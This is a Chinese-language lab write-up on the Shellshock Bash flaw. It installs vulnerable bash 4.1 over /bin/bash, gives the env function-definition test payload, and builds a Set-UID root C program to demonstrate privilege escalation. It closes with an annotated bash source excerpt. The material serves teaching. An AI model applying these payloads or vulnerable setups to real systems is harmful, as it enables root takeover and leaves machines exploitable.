ShellShock 攻击实验
(一)何为ShellShock?
2014年9月24日,Bash中发现了一个严重漏洞shellshock,该漏洞可用于许多系统,并且既可以远程也可以在本地触发,这项漏洞的威胁程度之所以堪比“心脏流血”,一定程度上是因为Shellshock所影响的Bash软件,同样被广泛应用与各类网络服务器以及其他电脑设备。要是用一句话概括这个漏洞,就是代码和数据没有正确区分。
(二)实验准备
(1)环境搭建
sudo su
wget http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz
(2)安装
tar xf bash-4.1.tar.gz
cd bash-4.1
./configure
make && make install
(3)链接
rm /bin/bash
ln -s /usr/local/bin/bash /bin/bash
(4)漏洞检查
exit
env x='() { :; }; echo vulnerable' bash -c "echo this is a test "
(三)实验过程
(1)本实验中,我们通过攻击Set-UID程序来获得root权限。 首先,确保安装了带有漏洞的bash版本,并让/bin/sh 指向/bin/bash,然后在 /home/shiyanlou 目录下新建一个 shock.c 文件。
sudo ln -sf /bin/bash /bin/sh
vi shock.c
输入如下内容:
#include <stdio.h>
void main()
{
setuid(geteuid()); // make real uid = effective uid.
system("/bin/ls -l");
}
(2)编译这段代码,并设置其为Set-UID程序,保证它的所有者是root
sudo su
gcc -o shock shock.c
chmod u+s shock
ls -il shock
这里使用了setuid(geteuid()) 来使real uid = effective uid,这在Set-UID程序中不是普遍现象,但它确实有时会发生。
如果 setuid(geteuid()) 语句被去掉了,再试试看攻击
失败了!这就说明如果 real uid 和 effective uid 相同的话,定义在环境变量中的内容在该程序内有效,那样shellshock漏洞就能够被利用了。但是如果两个 uid 不同的话,环境变量失效,就无法发动攻击了
(3)这里给出部分代码
void initialize_shell_variables(){
// 循环遍历所有环境变量
for (string_index = 0; string = env[string_index++]; ) {
/*...*/
/* 如果有export过的函数, 在这里定义 */
/* 无法导入在特权模式下(root下)定义的函数 */
if (privmode == 0 && read_but_dont_execute == 0 &&
STREQN (“() {“, string, 4)) {
[...]
// 这里是shellshock发生的地方
// 传递函数定义 + 运行额外的指令
parse_and_execute (temp_string, name, SEVAL_NONINT|SEVAL_NOHIST);
[...]
}
}